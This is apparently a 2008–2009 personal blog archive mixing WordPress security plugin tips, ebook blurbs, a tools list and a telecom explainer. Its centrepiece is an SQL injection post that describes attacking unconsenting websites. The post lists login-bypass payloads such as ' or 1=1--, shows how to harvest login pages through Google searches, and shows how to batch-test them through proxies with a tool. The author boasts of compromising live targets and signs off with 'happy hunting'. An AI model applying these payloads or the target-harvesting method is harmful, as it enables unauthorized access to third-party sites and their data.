Tips Secure WordPress

Posted in Blogging with tags on March 10, 2009 by fl3xu5

The following are the plugins I found that can make WordPress more secure.

1. Limit Login Attempts : This plugin blocks a user for 20 minutes after he enters wrong password 4 times (default values, can be changed). It is good way to avoid Brute Force attack .

2. Sabre :If you own a WordPress powered blog where users can register freely and see a lot of fake registrations, this plugin can stop fake user registration by bots. It can add image verification or math test to registration process among other measures to make sure fake users are not created

3. Semisecure Login : This plugin increases the security of login process by using a public key to encrypt the password on client side. The server side then decrypts the password using the private key. Requires Javascript and PHP.

4. Bad Behavior : It checks the visitor’s IP against Project Honey Pot Database to see if it’s a spammer’s. If malicious, it can block that IP from accessing your blog.

5. Secure WordPress : This plugin keeps your WordPress installation secure with the help of little functions. It hides information regarding your WordPress version from non-administrators and plugin directory from visitors by dropping a blank index.php file.


SQL Injection

Posted in Hacking, Security on March 4, 2009 by fl3xu5

One of the major problems with SQL is its poor security issues surrounding is the login and url strings.
this tutorial is not going to go into detail on why these string work as am not a coder i just know what i know and it works



with these two search string you will have plenty of targets to chose from…finding one thats vulnerable is another question

first let me go into details on how i go about my research

i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs…legally cool…provided by my good friend Gsecur aka ICE..also an Astal member.. “thanks mate” .. gives me a chance to concentrate on what am doing and not be looking over my shoulder


this is the easiest part…very simple

on the login page just enter something like

user:admin (you dont even have to put this.)
pass:’ or 1=1–


user:’ or 1=1–
admin:’ or 1=1–

some sites will have just a password so

password:’ or 1=1–

infact i have compiled a combo list with strings like this to use on my chosen targets ….there are plenty of strings about , the list below is a sample of the most common used

there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths…but thats another paper

the one am interested in are quick access to targets

i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit
of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go thought 40 sites cutting and pasting each string ??

combo example:

admin:’ or a=a–
admin:’ or 1=1–

and so on…it dont have to be admin can be anything you want… the most important part is example:’ or 1=1– this is our injection

now the only trudge part is finding targets to exploit…so i tend to search say google for login.asp or whatever

index of:/admin/login.asp

like this: index of login.asp


17,000 possible targets trying various searches spews out plent more
now using proxys set in my browser i then click through interesting targets…seeing whats what on the site pages if interesting
i then cut and paste url as a possible target…after an hour or so you have a list of sites of potential targets like so

and so on…in a couple of hours you can build up quite a list…reason i dont sellect all results or spider for login pages is
i want to keep the noise level low…my ISP.. well enough said…plus atm am on dial-up so to slow for me

i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo list… i dont want to go into
problems with users using Ares..thing is i know it works for me…

sit back and wait…any target vulnerable with show up in the hits box…now when it finds a target it will spew all the strings on that site as vulnerable…you have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site …really i need a program that will return the hit with a click on url and ignore false outputs

am still looking….thing is it saves quite a bit of time going to each site and each string to find its not exploitable.

there you go you should have access to your vulnerable target by now

another thing you can use the strings in the urls were user=? edit the url to the = part and paste ‘ or 1=1– so it becomes

user=’ or 1=1– just as quick as login process


‘ or 0=0 —

” or 0=0 —

or 0=0 —

‘ or 0=0 #

” or 0=0 #

or 0=0 #

‘ or ‘x’=’x

” or “x”=”x

‘) or (‘x’=’x

‘ or 1=1–

” or 1=1–

or 1=1–

‘ or a=a–

” or “a”=”a

‘) or (‘a’=’a

“) or (“a”=”a

hi” or “a”=”a

hi” or 1=1 —

hi’ or 1=1 —

hi’ or ‘a’=’a

hi’) or (‘a’=’a

hi”) or (“a”=”a

happy hunting

ComSec aka ZSL


Posted in Ebook with tags on February 8, 2009 by fl3xu5

UMTS (Universal Mobile Telecommunication System) is the third generation telecommunications system based on WCDMA. WCDMA (Wideband Code Division Multiple Access) is the radio interface for UMTS. WCDMA is characterised by use of a wider band than CDMA. It has additional advantages of high transfer rate, and increased system capacity and communication quality by statistical multiplexing, etc. WCDMA efficiently utilises the radio spectrum to provide a maximum data rate of 2 Mbit/s.
UMTS (Universal Mobile Telecommunication System) will offer a consistent set of services to mobile computer and phone users no matter where they are located in the world. Based on the GSM (Global System for Mobile communication) communication standard, UMTS, endorsed by major standards bodies and manufacturers, is the planned standard for mobile users around the world by 2002. Continue reading


Posted in Ebook, Telecommunication with tags , on January 9, 2009 by fl3xu5

Understand the business case for deploying MPLS-based services and solutions

Provides network managers and architects a precise MPLS primer
Defines MPLS service problems and their associated solutions
Includes ROI models for MPLS-based solutions
Discusses pros and cons of various options for each MPLS service
Network managers often question the value that MPLS brings to their business environment. This book provides them with a precise guide for evaluating the benefits of MPLS-based applications and solutions. The book guides the network manager through the business case for MPLS by exploring other technology alternatives, including their applications, benefits, and deficiencies. Understanding the service creation process as the basis for MPLS-based solutions is pivotal when describing the benefits that MPLS offers. Furthermore, the book explores MPLS technology and its components, providing an overview of the architecture necessary to reap the true advantages that MPLS brings to a service provider or enterprise network. These advantages include new revenue opportunities and a total cost of ownership reduction that positively impacts a company’s bottom-line. ROI models and case study examples further confirm the business impact and help decision-makers create a blueprint for MPLS service creation. Specific aspects such as security, network management, advanced services and the future of the technology complete the book, helping decision makers assess MPLS as a candidate for implementation. In short, you can use this comprehensive guide to understand and build a business case for the inclusion of MPLS in your network.

Click here


Posted in Ebook, Hacking, Security with tags , , on December 13, 2008 by fl3xu5

Everyone knows that Google lets you search billions of web pages. But few people realize that Google also gives you hundreds of cool ways to organize and play with information.

Since we released the last edition of this bestselling book, Google has added many new features and services to its expanding universe: Google Earth, Google Talk, Google Maps, Google Blog Search, Video Search, Music Search, Google Base, Google Reader, and Google Desktop among them. We’ve found ways to get these new services to do even more.

The expanded third edition of Google Hacks is a brand-new and infinitely more useful book for this powerful search engine. You’ll not only find dozens of hacks for the new Google services, but plenty of updated tips, tricks and scripts for hacking the old ones. Now you can make a Google Earth movie, visualize your web site traffic with Google Analytics, post pictures to your blog with Picasa, or access Gmail in your favorite email client. Industrial strength and real-world tested, this new collection enables you to mine a ton of information within Google’s reach. And have a lot of fun while doing it:

Search Google over IM with a Google Talk bot
Build a customized Google Map and add it to your own web site
Cover your searching tracks and take back your browsing privacy
Turn any Google query into an RSS feed that you can monitor in Google Reader or the newsreader of your choice
Keep tabs on blogs in new, useful ways
Turn Gmail into an external hard drive for Windows, Mac, or Linux
Beef up your web pages with search, ads, news feeds, and more
Program Google with the Google API and language of your choice
For those of you concerned about Google as an emerging Big Brother, this new edition also offers advice and concrete tips for protecting your privacy. Get into the world of Google and bend it to your will!

Want to download the books ???
Click here

Top 15 Security/Hacking Tools & Utilities

Posted in Hacking, Security with tags , on June 14, 2008 by fl3xu5

1. Nmap

I think everyone has heard of this one, recently evolved into the 4.x series.

Nmap (”Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.

Can be used by beginners (-sT) or by pros alike (–packet_trace). A very versatile tool, once you fully understand the results. Continue reading

OFDM and OFDMA: The Difference

Posted in Mobile Communication, Telecommunication with tags , on May 1, 2008 by fl3xu5

I was curious as to why IEEE 802.16d (fixed service) uses Orthogonal Frequency Division Multiplexing (OFDM). IEEE 802.16e (mobile) uses Orthogonal Frequency Division Multiple Access (OFDMA). So, what’s the difference between the two, and why is there a difference?

Lets first look at FDM:

In FDM system, signals from multiple transmitters are transmitted simultaneously (at the same time slot) over multiple frequencies. Each frequency range (sub-carrier) is modulated separately by different data stream and a spacing (guard band) is placed between sub-carriers to avoid signal overlap.

OFDM is sometimes referred to as discrete multi-tone modulation because, instead of a single carrier being modulated, a large number of evenly spaced subcarriers are modulated using some m-ary of QAM. This is a spread-spectrum technique that increases the efficiency of data communications by increasing data throughput because there are more carriers to modulate. In addition, problems with multi-path signal cancellation and spectral interference are greatly reduced by selectively modulating the “clear” carriers or ignoring carriers with high bit-rate errors.
Like FDM, OFDM also uses multiple sub-carriers but the sub-carriers are closely spaced to each other without causing interference, removing guard bands between adjacent sub-carriers. This is possible because the frequencies (sub-carriers) are orthogonal, meaning the peak of one sub-carrier coincides with the null of an adjacent sub-carrier.
In an OFDM system, a very high rate data stream is divided into multiple parallel low rate data streams. Each smaller data stream is then mapped to individual data sub-carrier and modulated using some sorts of PSK (Phase Shift Keying) or QAM (Quadrature Amplitude Modulation). i.e. BPSK, QPSK, 16-QAM, 64-QAM.
OFDM needs less bandwidth than FDM to carry the same amount of information which translates to higher spectral efficiency. Besides a high spectral efficiency, an OFDM system such as WiMAX is more resilient in NLOS environment. It can efficiently overcome interference and frequency-selective fading caused by multipath because equalizing is done on a subset of sub-carriers instead of a single broader carrier. The effect of ISI (Inter Symbol Interference) is suppressed by virtue of a longer symbol period of the parallel OFDM sub-carriers than a single carrier system and the use of a cyclic prefix (CP).
The OFDM spread-spectrum scheme is used for many broadly used applications, including digital TV broadcasting in Australia, Japan and Europe; digital audio broadcasting in Europe; Asynchronous Digital Subscriber Line (ADSL) modems and wireless networking worldwide (IEEE 802.11a/g).